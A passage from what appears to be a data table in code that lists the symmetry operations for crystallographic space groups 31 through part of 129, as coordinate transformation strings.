31: ['x,y,z', '-x+1/2,-y,z+1/2', 'x+1/2,-y,z+1/2', '-x,y,z'],
32: ['x,y,z', '-x,-y,z', 'x+1/2,-y+1/2,z', '-x+1/2,y+1/2,z'],
33: ['x,y,z', '-x,-y,z+1/2', 'x+1/2,-y+1/2,z', '-x+1/2,y+1/2,z+1/2'],
34: ['x,y,z', '-x,-y,z', 'x+1/2,-y+1/2,z+1/2', '-x+1/2,y+1/2,z+1/2'],
35: ['x,y,z', '-x,-y,z', 'x,-y,z', '-x,y,z', 'x+1/2,y+1/2,z', '-x+1/2,-y+1/2,z', 'x+1/2,-y+1/2,z',
'-x+1/2,y+1/2,z'],
36: ['x,y,z', '-x,-y,z+1/2', 'x,-y,z+1/2', '-x,y,z', 'x+1/2,y+1/2,z', '-x+1/2,-y+1/2,z+1/2',
'x+1/2,-y+1/2,z+1/2', '-x+1/2,y+1/2,z'],
37: ['x,y,z', '-x,-y,z', 'x,-y,z+1/2', '-x,y,z+1/2', 'x+1/2,y+1/2,z', '-x+1/2,-y+1/2,z', 'x+1/2,-y+1/2,z+1/2',
'-x+1/2,y+1/2,z+1/2'],
38: ['x,y,z', '-x,-y,z', 'x,-y,z', '-x,y,z', 'x,y+1/2,z+1/2', '-x,-y+1/2,z+1/2', 'x,-y+1/2,z+1/2',
'-x,y+1/2,z+1/2'],
39: ['x,y,z', '-x,-y,z', 'x,-y+1/2,z', '-x,y+1/2,z', 'x,y+1/2,z+1/2', '-x,-y+1/2,z+1/2', 'x,-y,z+1/2',
'-x,y,z+1/2'],
40: ['x,y,z', '-x,-y,z', 'x+1/2,-y,z', '-x+1/2,y,z', 'x,y+1/2,z+1/2', '-x,-y+1/2,z+1/2', 'x+1/2,-y+1/2,z+1/2',
'-x+1/2,y+1/2,z+1/2'],
41: ['x,y,z', '-x,-y,z', 'x+1/2,-y+1/2,z', '-x+1/2,y+1/2,z', 'x,y+1/2,z+1/2', '-x,-y+1/2,z+1/2',
'x+1/2,-y,z+1/2', '-x+1/2,y,z+1/2'],
42: ['x,y,z', '-x,-y,z', 'x,-y,z', '-x,y,z', 'x,y+1/2,z+1/2', '-x,-y+1/2,z+1/2', 'x,-y+1/2,z+1/2',
'-x,y+1/2,z+1/2', 'x+1/2,y,z+1/2', '-x+1/2,-y,z+1/2', 'x+1/2,-y,z+1/2', '-x+1/2,y,z+1/2', 'x+1/2,y+1/2,z',
'-x+1/2,-y+1/2,z', 'x+1/2,-y+1/2,z', '-x+1/2,y+1/2,z'],
43: ['x,y,z', '-x,-y,z', 'x+1/4,-y+1/4,z+1/4', '-x+1/4,y+1/4,z+1/4', 'x,y+1/2,z+1/2', '-x,-y+1/2,z+1/2',
'x+1/4,-y+3/4,z+3/4', '-x+1/4,y+3/4,z+3/4', 'x+1/2,y,z+1/2', '-x+1/2,-y,z+1/2', 'x+3/4,-y+1/4,z+3/4',
'-x+3/4,y+1/4,z+3/4', 'x+1/2,y+1/2,z', '-x+1/2,-y+1/2,z', 'x+3/4,-y+3/4,z+1/4', '-x+3/4,y+3/4,z+1/4'],
44: ['x,y,z', '-x,-y,z', 'x,-y,z', '-x,y,z', 'x+1/2,y+1/2,z+1/2', '-x+1/2,-y+1/2,z+1/2', 'x+1/2,-y+1/2,z+1/2',
'-x+1/2,y+1/2,z+1/2'],
45: ['x,y,z', '-x,-y,z', 'x+1/2,-y+1/2,z', '-x+1/2,y+1/2,z', 'x+1/2,y+1/2,z+1/2', '-x+1/2,-y+1/2,z+1/2',
'x,-y,z+1/2', '-x,y,z+1/2'],
46: ['x,y,z', '-x,-y,z', 'x+1/2,-y,z', '-x+1/2,y,z', 'x+1/2,y+1/2,z+1/2', '-x+1/2,-y+1/2,z+1/2',
'x,-y+1/2,z+1/2', '-x,y+1/2,z+1/2'],
47: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', '-x,-y,-z', 'x,y,-z', 'x,-y,z', '-x,y,z'],
48: ['x,y,z', '-x+1/2,-y+1/2,z', '-x+1/2,y,-z+1/2', 'x,-y+1/2,-z+1/2', '-x,-y,-z', 'x+1/2,y+1/2,-z',
'x+1/2,-y,z+1/2', '-x,y+1/2,z+1/2'],
49: ['x,y,z', '-x,-y,z', '-x,y,-z+1/2', 'x,-y,-z+1/2', '-x,-y,-z', 'x,y,-z', 'x,-y,z+1/2', '-x,y,z+1/2'],
50: ['x,y,z', '-x+1/2,-y+1/2,z', '-x+1/2,y,-z', 'x,-y+1/2,-z', '-x,-y,-z', 'x+1/2,y+1/2,-z', 'x+1/2,-y,z',
'-x,y+1/2,z'],
51: ['x,y,z', '-x+1/2,-y,z', '-x,y,-z', 'x+1/2,-y,-z', '-x,-y,-z', 'x+1/2,y,-z', 'x,-y,z', '-x+1/2,y,z'],
52: ['x,y,z', '-x+1/2,-y,z', '-x+1/2,y+1/2,-z+1/2', 'x,-y+1/2,-z+1/2', '-x,-y,-z', 'x+1/2,y,-z',
'x+1/2,-y+1/2,z+1/2', '-x,y+1/2,z+1/2'],
53: ['x,y,z', '-x+1/2,-y,z+1/2', '-x+1/2,y,-z+1/2', 'x,-y,-z', '-x,-y,-z', 'x+1/2,y,-z+1/2', 'x+1/2,-y,z+1/2',
'-x,y,z'],
54: ['x,y,z', '-x+1/2,-y,z', '-x,y,-z+1/2', 'x+1/2,-y,-z+1/2', '-x,-y,-z', 'x+1/2,y,-z', 'x,-y,z+1/2',
'-x+1/2,y,z+1/2'],
55: ['x,y,z', '-x,-y,z', '-x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,-z', '-x,-y,-z', 'x,y,-z', 'x+1/2,-y+1/2,z',
'-x+1/2,y+1/2,z'],
56: ['x,y,z', '-x+1/2,-y+1/2,z', '-x,y+1/2,-z+1/2', 'x+1/2,-y,-z+1/2', '-x,-y,-z', 'x+1/2,y+1/2,-z',
'x,-y+1/2,z+1/2', '-x+1/2,y,z+1/2'],
57: ['x,y,z', '-x,-y,z+1/2', '-x,y+1/2,-z+1/2', 'x,-y+1/2,-z', '-x,-y,-z', 'x,y,-z+1/2', 'x,-y+1/2,z+1/2',
'-x,y+1/2,z'],
58: ['x,y,z', '-x,-y,z', '-x+1/2,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z+1/2', '-x,-y,-z', 'x,y,-z',
'x+1/2,-y+1/2,z+1/2', '-x+1/2,y+1/2,z+1/2'],
59: ['x,y,z', '-x+1/2,-y+1/2,z', '-x,y+1/2,-z', 'x+1/2,-y,-z', '-x,-y,-z', 'x+1/2,y+1/2,-z', 'x,-y+1/2,z',
'-x+1/2,y,z'],
60: ['x,y,z', '-x+1/2,-y+1/2,z+1/2', '-x,y,-z+1/2', 'x+1/2,-y+1/2,-z', '-x,-y,-z', 'x+1/2,y+1/2,-z+1/2',
'x,-y,z+1/2', '-x+1/2,y+1/2,z'],
61: ['x,y,z', '-x+1/2,-y,z+1/2', '-x,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z', '-x,-y,-z', 'x+1/2,y,-z+1/2',
'x,-y+1/2,z+1/2', '-x+1/2,y+1/2,z'],
62: ['x,y,z', '-x+1/2,-y,z+1/2', '-x,y+1/2,-z', 'x+1/2,-y+1/2,-z+1/2', '-x,-y,-z', 'x+1/2,y,-z+1/2',
'x,-y+1/2,z', '-x+1/2,y+1/2,z+1/2'],
63: ['x,y,z', '-x,-y,z+1/2', '-x,y,-z+1/2', 'x,-y,-z', '-x,-y,-z', 'x,y,-z+1/2', 'x,-y,z+1/2', '-x,y,z',
'x+1/2,y+1/2,z', '-x+1/2,-y+1/2,z+1/2', '-x+1/2,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z', '-x+1/2,-y+1/2,-z',
'x+1/2,y+1/2,-z+1/2', 'x+1/2,-y+1/2,z+1/2', '-x+1/2,y+1/2,z'],
64: ['x,y,z', '-x,-y+1/2,z+1/2', '-x,y+1/2,-z+1/2', 'x,-y,-z', '-x,-y,-z', 'x,y+1/2,-z+1/2', 'x,-y+1/2,z+1/2',
'-x,y,z', 'x+1/2,y+1/2,z', '-x+1/2,-y,z+1/2', '-x+1/2,y,-z+1/2', 'x+1/2,-y+1/2,-z', '-x+1/2,-y+1/2,-z',
'x+1/2,y,-z+1/2', 'x+1/2,-y,z+1/2', '-x+1/2,y+1/2,z'],
65: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', '-x,-y,-z', 'x,y,-z', 'x,-y,z', '-x,y,z', 'x+1/2,y+1/2,z',
'-x+1/2,-y+1/2,z', '-x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,-z', '-x+1/2,-y+1/2,-z', 'x+1/2,y+1/2,-z',
'x+1/2,-y+1/2,z', '-x+1/2,y+1/2,z'],
66: ['x,y,z', '-x,-y,z', '-x,y,-z+1/2', 'x,-y,-z+1/2', '-x,-y,-z', 'x,y,-z', 'x,-y,z+1/2', '-x,y,z+1/2',
'x+1/2,y+1/2,z', '-x+1/2,-y+1/2,z', '-x+1/2,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z+1/2', '-x+1/2,-y+1/2,-z',
'x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,z+1/2', '-x+1/2,y+1/2,z+1/2'],
67: ['x,y,z', '-x,-y+1/2,z', '-x,y+1/2,-z', 'x,-y,-z', '-x,-y,-z', 'x,y+1/2,-z', 'x,-y+1/2,z', '-x,y,z',
'x+1/2,y+1/2,z', '-x+1/2,-y,z', '-x+1/2,y,-z', 'x+1/2,-y+1/2,-z', '-x+1/2,-y+1/2,-z', 'x+1/2,y,-z',
'x+1/2,-y,z', '-x+1/2,y+1/2,z'],
68: ['x,y,z', '-x+1/2,-y,z', '-x,y,-z+1/2', 'x+1/2,-y,-z+1/2', '-x,-y,-z', 'x+1/2,y,-z', 'x,-y,z+1/2',
'-x+1/2,y,z+1/2', 'x+1/2,y+1/2,z', '-x,-y+1/2,z', '-x+1/2,y+1/2,-z+1/2', 'x,-y+1/2,-z+1/2',
'-x+1/2,-y+1/2,-z', 'x,y+1/2,-z', 'x+1/2,-y+1/2,z+1/2', '-x,y+1/2,z+1/2'],
69: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', '-x,-y,-z', 'x,y,-z', 'x,-y,z', '-x,y,z', 'x,y+1/2,z+1/2',
'-x,-y+1/2,z+1/2', '-x,y+1/2,-z+1/2', 'x,-y+1/2,-z+1/2', '-x,-y+1/2,-z+1/2', 'x,y+1/2,-z+1/2',
'x,-y+1/2,z+1/2', '-x,y+1/2,z+1/2', 'x+1/2,y,z+1/2', '-x+1/2,-y,z+1/2', '-x+1/2,y,-z+1/2',
'x+1/2,-y,-z+1/2', '-x+1/2,-y,-z+1/2', 'x+1/2,y,-z+1/2', 'x+1/2,-y,z+1/2', '-x+1/2,y,z+1/2',
'x+1/2,y+1/2,z', '-x+1/2,-y+1/2,z', '-x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,-z', '-x+1/2,-y+1/2,-z',
'x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,z', '-x+1/2,y+1/2,z'],
70: ['x,y,z', '-x+3/4,-y+3/4,z', '-x+3/4,y,-z+3/4', 'x,-y+3/4,-z+3/4', '-x,-y,-z', 'x+1/4,y+1/4,-z',
'x+1/4,-y,z+1/4', '-x,y+1/4,z+1/4', 'x,y+1/2,z+1/2', '-x+3/4,-y+1/4,z+1/2', '-x+3/4,y+1/2,-z+1/4',
'x,-y+1/4,-z+1/4', '-x,-y+1/2,-z+1/2', 'x+1/4,y+3/4,-z+1/2', 'x+1/4,-y+1/2,z+3/4', '-x,y+3/4,z+3/4',
'x+1/2,y,z+1/2', '-x+1/4,-y+3/4,z+1/2', '-x+1/4,y,-z+1/4', 'x+1/2,-y+3/4,-z+1/4', '-x+1/2,-y,-z+1/2',
'x+3/4,y+1/4,-z+1/2', 'x+3/4,-y,z+3/4', '-x+1/2,y+1/4,z+3/4', 'x+1/2,y+1/2,z', '-x+1/4,-y+1/4,z',
'-x+1/4,y+1/2,-z+3/4', 'x+1/2,-y+1/4,-z+3/4', '-x+1/2,-y+1/2,-z', 'x+3/4,y+3/4,-z', 'x+3/4,-y+1/2,z+1/4',
'-x+1/2,y+3/4,z+1/4'],
71: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', '-x,-y,-z', 'x,y,-z', 'x,-y,z', '-x,y,z', 'x+1/2,y+1/2,z+1/2',
'-x+1/2,-y+1/2,z+1/2', '-x+1/2,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z+1/2', '-x+1/2,-y+1/2,-z+1/2',
'x+1/2,y+1/2,-z+1/2', 'x+1/2,-y+1/2,z+1/2', '-x+1/2,y+1/2,z+1/2'],
72: ['x,y,z', '-x,-y,z', '-x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,-z', '-x,-y,-z', 'x,y,-z', 'x+1/2,-y+1/2,z',
'-x+1/2,y+1/2,z', 'x+1/2,y+1/2,z+1/2', '-x+1/2,-y+1/2,z+1/2', '-x,y,-z+1/2', 'x,-y,-z+1/2',
'-x+1/2,-y+1/2,-z+1/2', 'x+1/2,y+1/2,-z+1/2', 'x,-y,z+1/2', '-x,y,z+1/2'],
73: ['x,y,z', '-x+1/2,-y,z+1/2', '-x,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z', '-x,-y,-z', 'x+1/2,y,-z+1/2',
'x,-y+1/2,z+1/2', '-x+1/2,y+1/2,z', 'x+1/2,y+1/2,z+1/2', '-x,-y+1/2,z', '-x+1/2,y,-z', 'x,-y,-z+1/2',
'-x+1/2,-y+1/2,-z+1/2', 'x,y+1/2,-z', 'x+1/2,-y,z', '-x,y,z+1/2'],
74: ['x,y,z', '-x,-y+1/2,z', '-x,y+1/2,-z', 'x,-y,-z', '-x,-y,-z', 'x,y+1/2,-z', 'x,-y+1/2,z', '-x,y,z',
'x+1/2,y+1/2,z+1/2', '-x+1/2,-y,z+1/2', '-x+1/2,y,-z+1/2', 'x+1/2,-y+1/2,-z+1/2', '-x+1/2,-y+1/2,-z+1/2',
'x+1/2,y,-z+1/2', 'x+1/2,-y,z+1/2', '-x+1/2,y+1/2,z+1/2'],
75: ['x,y,z', '-x,-y,z', '-y,x,z', 'y,-x,z'],
76: ['x,y,z', '-x,-y,z+1/2', '-y,x,z+1/4', 'y,-x,z+3/4'],
77: ['x,y,z', '-x,-y,z', '-y,x,z+1/2', 'y,-x,z+1/2'],
78: ['x,y,z', '-x,-y,z+1/2', '-y,x,z+3/4', 'y,-x,z+1/4'],
79: ['x,y,z', '-x,-y,z', '-y,x,z', 'y,-x,z', 'x+1/2,y+1/2,z+1/2', '-x+1/2,-y+1/2,z+1/2', '-y+1/2,x+1/2,z+1/2',
'y+1/2,-x+1/2,z+1/2'],
80: ['x,y,z', '-x+1/2,-y+1/2,z+1/2', '-y,x+1/2,z+1/4', 'y+1/2,-x,z+3/4', 'x+1/2,y+1/2,z+1/2', '-x,-y,z',
'-y+1/2,x,z+3/4', 'y,-x+1/2,z+1/4'],
81: ['x,y,z', '-x,-y,z', 'y,-x,-z', '-y,x,-z'],
82: ['x,y,z', '-x,-y,z', 'y,-x,-z', '-y,x,-z', 'x+1/2,y+1/2,z+1/2', '-x+1/2,-y+1/2,z+1/2',
'y+1/2,-x+1/2,-z+1/2', '-y+1/2,x+1/2,-z+1/2'],
83: ['x,y,z', '-x,-y,z', '-y,x,z', 'y,-x,z', '-x,-y,-z', 'x,y,-z', 'y,-x,-z', '-y,x,-z'],
84: ['x,y,z', '-x,-y,z', '-y,x,z+1/2', 'y,-x,z+1/2', '-x,-y,-z', 'x,y,-z', 'y,-x,-z+1/2', '-y,x,-z+1/2'],
85: ['x,y,z', '-x+1/2,-y+1/2,z', '-y+1/2,x,z', 'y,-x+1/2,z', '-x,-y,-z', 'x+1/2,y+1/2,-z', 'y+1/2,-x,-z',
'-y,x+1/2,-z'],
86: ['x,y,z', '-x+1/2,-y+1/2,z', '-y,x+1/2,z+1/2', 'y+1/2,-x,z+1/2', '-x,-y,-z', 'x+1/2,y+1/2,-z',
'y,-x+1/2,-z+1/2', '-y+1/2,x,-z+1/2'],
87: ['x,y,z', '-x,-y,z', '-y,x,z', 'y,-x,z', '-x,-y,-z', 'x,y,-z', 'y,-x,-z', '-y,x,-z', 'x+1/2,y+1/2,z+1/2',
'-x+1/2,-y+1/2,z+1/2', '-y+1/2,x+1/2,z+1/2', 'y+1/2,-x+1/2,z+1/2', '-x+1/2,-y+1/2,-z+1/2',
'x+1/2,y+1/2,-z+1/2', 'y+1/2,-x+1/2,-z+1/2', '-y+1/2,x+1/2,-z+1/2'],
88: ['x,y,z', '-x+1/2,-y,z+1/2', '-y+3/4,x+1/4,z+1/4', 'y+3/4,-x+3/4,z+3/4', '-x,-y,-z', 'x+1/2,y,-z+1/2',
'y+1/4,-x+3/4,-z+3/4', '-y+1/4,x+1/4,-z+1/4', 'x+1/2,y+1/2,z+1/2', '-x,-y+1/2,z', '-y+1/4,x+3/4,z+3/4',
'y+1/4,-x+1/4,z+1/4', '-x+1/2,-y+1/2,-z+1/2', 'x,y+1/2,-z', 'y+3/4,-x+1/4,-z+1/4', '-y+3/4,x+3/4,-z+3/4'],
89: ['x,y,z', '-x,-y,z', '-y,x,z', 'y,-x,z', '-x,y,-z', 'x,-y,-z', 'y,x,-z', '-y,-x,-z'],
90: ['x,y,z', '-x,-y,z', '-y+1/2,x+1/2,z', 'y+1/2,-x+1/2,z', '-x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,-z', 'y,x,-z',
'-y,-x,-z'],
91: ['x,y,z', '-x,-y,z+1/2', '-y,x,z+1/4', 'y,-x,z+3/4', '-x,y,-z', 'x,-y,-z+1/2', 'y,x,-z+3/4',
'-y,-x,-z+1/4'],
92: ['x,y,z', '-x,-y,z+1/2', '-y+1/2,x+1/2,z+1/4', 'y+1/2,-x+1/2,z+3/4', '-x+1/2,y+1/2,-z+1/4',
'x+1/2,-y+1/2,-z+3/4', 'y,x,-z', '-y,-x,-z+1/2'],
93: ['x,y,z', '-x,-y,z', '-y,x,z+1/2', 'y,-x,z+1/2', '-x,y,-z', 'x,-y,-z', 'y,x,-z+1/2', '-y,-x,-z+1/2'],
94: ['x,y,z', '-x,-y,z', '-y+1/2,x+1/2,z+1/2', 'y+1/2,-x+1/2,z+1/2', '-x+1/2,y+1/2,-z+1/2',
'x+1/2,-y+1/2,-z+1/2', 'y,x,-z', '-y,-x,-z'],
95: ['x,y,z', '-x,-y,z+1/2', '-y,x,z+3/4', 'y,-x,z+1/4', '-x,y,-z', 'x,-y,-z+1/2', 'y,x,-z+1/4',
'-y,-x,-z+3/4'],
96: ['x,y,z', '-x,-y,z+1/2', '-y+1/2,x+1/2,z+3/4', 'y+1/2,-x+1/2,z+1/4', '-x+1/2,y+1/2,-z+3/4',
'x+1/2,-y+1/2,-z+1/4', 'y,x,-z', '-y,-x,-z+1/2'],
97: ['x,y,z', '-x,-y,z', '-y,x,z', 'y,-x,z', '-x,y,-z', 'x,-y,-z', 'y,x,-z', '-y,-x,-z', 'x+1/2,y+1/2,z+1/2',
'-x+1/2,-y+1/2,z+1/2', '-y+1/2,x+1/2,z+1/2', 'y+1/2,-x+1/2,z+1/2', '-x+1/2,y+1/2,-z+1/2',
'x+1/2,-y+1/2,-z+1/2', 'y+1/2,x+1/2,-z+1/2', '-y+1/2,-x+1/2,-z+1/2'],
98: ['x,y,z', '-x+1/2,-y+1/2,z+1/2', '-y,x+1/2,z+1/4', 'y+1/2,-x,z+3/4', '-x+1/2,y,-z+3/4', 'x,-y+1/2,-z+1/4',
'y+1/2,x+1/2,-z+1/2', '-y,-x,-z', 'x+1/2,y+1/2,z+1/2', '-x,-y,z', '-y+1/2,x,z+3/4', 'y,-x+1/2,z+1/4',
'-x,y+1/2,-z+1/4', 'x+1/2,-y,-z+3/4', 'y,x,-z', '-y+1/2,-x+1/2,-z+1/2'],
99: ['x,y,z', '-x,-y,z', '-y,x,z', 'y,-x,z', 'x,-y,z', '-x,y,z', '-y,-x,z', 'y,x,z'],
100: ['x,y,z', '-x,-y,z', '-y,x,z', 'y,-x,z', 'x+1/2,-y+1/2,z', '-x+1/2,y+1/2,z', '-y+1/2,-x+1/2,z',
'y+1/2,x+1/2,z'],
101: ['x,y,z', '-x,-y,z', '-y,x,z+1/2', 'y,-x,z+1/2', 'x,-y,z+1/2', '-x,y,z+1/2', '-y,-x,z', 'y,x,z'],
102: ['x,y,z', '-x,-y,z', '-y+1/2,x+1/2,z+1/2', 'y+1/2,-x+1/2,z+1/2', 'x+1/2,-y+1/2,z+1/2',
'-x+1/2,y+1/2,z+1/2', '-y,-x,z', 'y,x,z'],
103: ['x,y,z', '-x,-y,z', '-y,x,z', 'y,-x,z', 'x,-y,z+1/2', '-x,y,z+1/2', '-y,-x,z+1/2', 'y,x,z+1/2'],
104: ['x,y,z', '-x,-y,z', '-y,x,z', 'y,-x,z', 'x+1/2,-y+1/2,z+1/2', '-x+1/2,y+1/2,z+1/2',
'-y+1/2,-x+1/2,z+1/2', 'y+1/2,x+1/2,z+1/2'],
105: ['x,y,z', '-x,-y,z', '-y,x,z+1/2', 'y,-x,z+1/2', 'x,-y,z', '-x,y,z', '-y,-x,z+1/2', 'y,x,z+1/2'],
106: ['x,y,z', '-x,-y,z', '-y,x,z+1/2', 'y,-x,z+1/2', 'x+1/2,-y+1/2,z', '-x+1/2,y+1/2,z',
'-y+1/2,-x+1/2,z+1/2', 'y+1/2,x+1/2,z+1/2'],
107: ['x,y,z', '-x,-y,z', '-y,x,z', 'y,-x,z', 'x,-y,z', '-x,y,z', '-y,-x,z', 'y,x,z', 'x+1/2,y+1/2,z+1/2',
'-x+1/2,-y+1/2,z+1/2', '-y+1/2,x+1/2,z+1/2', 'y+1/2,-x+1/2,z+1/2', 'x+1/2,-y+1/2,z+1/2',
'-x+1/2,y+1/2,z+1/2', '-y+1/2,-x+1/2,z+1/2', 'y+1/2,x+1/2,z+1/2'],
108: ['x,y,z', '-x,-y,z', '-y,x,z', 'y,-x,z', 'x,-y,z+1/2', '-x,y,z+1/2', '-y,-x,z+1/2', 'y,x,z+1/2',
'x+1/2,y+1/2,z+1/2', '-x+1/2,-y+1/2,z+1/2', '-y+1/2,x+1/2,z+1/2', 'y+1/2,-x+1/2,z+1/2', 'x+1/2,-y+1/2,z',
'-x+1/2,y+1/2,z', '-y+1/2,-x+1/2,z', 'y+1/2,x+1/2,z'],
109: ['x,y,z', '-x+1/2,-y+1/2,z+1/2', '-y,x+1/2,z+1/4', 'y+1/2,-x,z+3/4', 'x,-y,z', '-x+1/2,y+1/2,z+1/2',
'-y,-x+1/2,z+1/4', 'y+1/2,x,z+3/4', 'x+1/2,y+1/2,z+1/2', '-x,-y,z', '-y+1/2,x,z+3/4', 'y,-x+1/2,z+1/4',
'x+1/2,-y+1/2,z+1/2', '-x,y,z', '-y+1/2,-x,z+3/4', 'y,x+1/2,z+1/4'],
110: ['x,y,z', '-x+1/2,-y+1/2,z+1/2', '-y,x+1/2,z+1/4', 'y+1/2,-x,z+3/4', 'x,-y,z+1/2', '-x+1/2,y+1/2,z',
'-y,-x+1/2,z+3/4', 'y+1/2,x,z+1/4', 'x+1/2,y+1/2,z+1/2', '-x,-y,z', '-y+1/2,x,z+3/4', 'y,-x+1/2,z+1/4',
'x+1/2,-y+1/2,z', '-x,y,z+1/2', '-y+1/2,-x,z+1/4', 'y,x+1/2,z+3/4'],
111: ['x,y,z', '-x,-y,z', 'y,-x,-z', '-y,x,-z', '-x,y,-z', 'x,-y,-z', '-y,-x,z', 'y,x,z'],
112: ['x,y,z', '-x,-y,z', 'y,-x,-z', '-y,x,-z', '-x,y,-z+1/2', 'x,-y,-z+1/2', '-y,-x,z+1/2', 'y,x,z+1/2'],
113: ['x,y,z', '-x,-y,z', 'y,-x,-z', '-y,x,-z', '-x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,-z', '-y+1/2,-x+1/2,z',
'y+1/2,x+1/2,z'],
114: ['x,y,z', '-x,-y,z', 'y,-x,-z', '-y,x,-z', '-x+1/2,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z+1/2',
'-y+1/2,-x+1/2,z+1/2', 'y+1/2,x+1/2,z+1/2'],
115: ['x,y,z', '-x,-y,z', 'y,-x,-z', '-y,x,-z', 'x,-y,z', '-x,y,z', 'y,x,-z', '-y,-x,-z'],
116: ['x,y,z', '-x,-y,z', 'y,-x,-z', '-y,x,-z', 'x,-y,z+1/2', '-x,y,z+1/2', 'y,x,-z+1/2', '-y,-x,-z+1/2'],
117: ['x,y,z', '-x,-y,z', 'y,-x,-z', '-y,x,-z', 'x+1/2,-y+1/2,z', '-x+1/2,y+1/2,z', 'y+1/2,x+1/2,-z',
'-y+1/2,-x+1/2,-z'],
118: ['x,y,z', '-x,-y,z', 'y,-x,-z', '-y,x,-z', 'x+1/2,-y+1/2,z+1/2', '-x+1/2,y+1/2,z+1/2',
'y+1/2,x+1/2,-z+1/2', '-y+1/2,-x+1/2,-z+1/2'],
119: ['x,y,z', '-x,-y,z', 'y,-x,-z', '-y,x,-z', 'x,-y,z', '-x,y,z', 'y,x,-z', '-y,-x,-z', 'x+1/2,y+1/2,z+1/2',
'-x+1/2,-y+1/2,z+1/2', 'y+1/2,-x+1/2,-z+1/2', '-y+1/2,x+1/2,-z+1/2', 'x+1/2,-y+1/2,z+1/2',
'-x+1/2,y+1/2,z+1/2', 'y+1/2,x+1/2,-z+1/2', '-y+1/2,-x+1/2,-z+1/2'],
120: ['x,y,z', '-x,-y,z', 'y,-x,-z', '-y,x,-z', 'x,-y,z+1/2', '-x,y,z+1/2', 'y,x,-z+1/2', '-y,-x,-z+1/2',
'x+1/2,y+1/2,z+1/2', '-x+1/2,-y+1/2,z+1/2', 'y+1/2,-x+1/2,-z+1/2', '-y+1/2,x+1/2,-z+1/2',
'x+1/2,-y+1/2,z', '-x+1/2,y+1/2,z', 'y+1/2,x+1/2,-z', '-y+1/2,-x+1/2,-z'],
121: ['x,y,z', '-x,-y,z', 'y,-x,-z', '-y,x,-z', '-x,y,-z', 'x,-y,-z', '-y,-x,z', 'y,x,z', 'x+1/2,y+1/2,z+1/2',
'-x+1/2,-y+1/2,z+1/2', 'y+1/2,-x+1/2,-z+1/2', '-y+1/2,x+1/2,-z+1/2', '-x+1/2,y+1/2,-z+1/2',
'x+1/2,-y+1/2,-z+1/2', '-y+1/2,-x+1/2,z+1/2', 'y+1/2,x+1/2,z+1/2'],
122: ['x,y,z', '-x,-y,z', 'y,-x,-z', '-y,x,-z', '-x+1/2,y,-z+3/4', 'x+1/2,-y,-z+3/4', '-y+1/2,-x,z+3/4',
'y+1/2,x,z+3/4', 'x+1/2,y+1/2,z+1/2', '-x+1/2,-y+1/2,z+1/2', 'y+1/2,-x+1/2,-z+1/2',
'-y+1/2,x+1/2,-z+1/2', '-x,y+1/2,-z+1/4', 'x,-y+1/2,-z+1/4', '-y,-x+1/2,z+1/4', 'y,x+1/2,z+1/4'],
123: ['x,y,z', '-x,-y,z', '-y,x,z', 'y,-x,z', '-x,y,-z', 'x,-y,-z', 'y,x,-z', '-y,-x,-z', '-x,-y,-z', 'x,y,-z',
'y,-x,-z', '-y,x,-z', 'x,-y,z', '-x,y,z', '-y,-x,z', 'y,x,z'],
124: ['x,y,z', '-x,-y,z', '-y,x,z', 'y,-x,z', '-x,y,-z+1/2', 'x,-y,-z+1/2', 'y,x,-z+1/2', '-y,-x,-z+1/2',
'-x,-y,-z', 'x,y,-z', 'y,-x,-z', '-y,x,-z', 'x,-y,z+1/2', '-x,y,z+1/2', '-y,-x,z+1/2', 'y,x,z+1/2'],
125: ['x,y,z', '-x+1/2,-y+1/2,z', '-y+1/2,x,z', 'y,-x+1/2,z', '-x+1/2,y,-z', 'x,-y+1/2,-z', 'y,x,-z',
'-y+1/2,-x+1/2,-z', '-x,-y,-z', 'x+1/2,y+1/2,-z', 'y+1/2,-x,-z', '-y,x+1/2,-z', 'x+1/2,-y,z',
'-x,y+1/2,z', '-y,-x,z', 'y+1/2,x+1/2,z'],
126: ['x,y,z', '-x+1/2,-y+1/2,z', '-y+1/2,x,z', 'y,-x+1/2,z', '-x+1/2,y,-z+1/2', 'x,-y+1/2,-z+1/2',
'y,x,-z+1/2', '-y+1/2,-x+1/2,-z+1/2', '-x,-y,-z', 'x+1/2,y+1/2,-z', 'y+1/2,-x,-z', '-y,x+1/2,-z',
'x+1/2,-y,z+1/2', '-x,y+1/2,z+1/2', '-y,-x,z+1/2', 'y+1/2,x+1/2,z+1/2'],
127: ['x,y,z', '-x,-y,z', '-y,x,z', 'y,-x,z', '-x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,-z', 'y+1/2,x+1/2,-z',
'-y+1/2,-x+1/2,-z', '-x,-y,-z', 'x,y,-z', 'y,-x,-z', '-y,x,-z', 'x+1/2,-y+1/2,z', '-x+1/2,y+1/2,z',
'-y+1/2,-x+1/2,z', 'y+1/2,x+1/2,z'],
128: ['x,y,z', '-x,-y,z', '-y,x,z', 'y,-x,z', '-x+1/2,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z+1/2',
'y+1/2,x+1/2,-z+1/2', '-y+1/2,-x+1/2,-z+1/2', '-x,-y,-z', 'x,y,-z', 'y,-x,-z', '-y,x,-z',
'x+1/2,-y+1/2,z+1/2', '-x+1/2,y+1/2,z+1/2', '-y+1/2,-x+1/2,z+1/2', 'y+1/2,x+1/2,z+1/2'],
129: ['x,y,z', '-x+1/2,-y+1/2,z', '-y+1/2,x,z', 'y,-x+1/2,z', '-x,y+1/2,-z', 'x+1/2,-y,-z', 'y+1/2,x+1/2,-z',
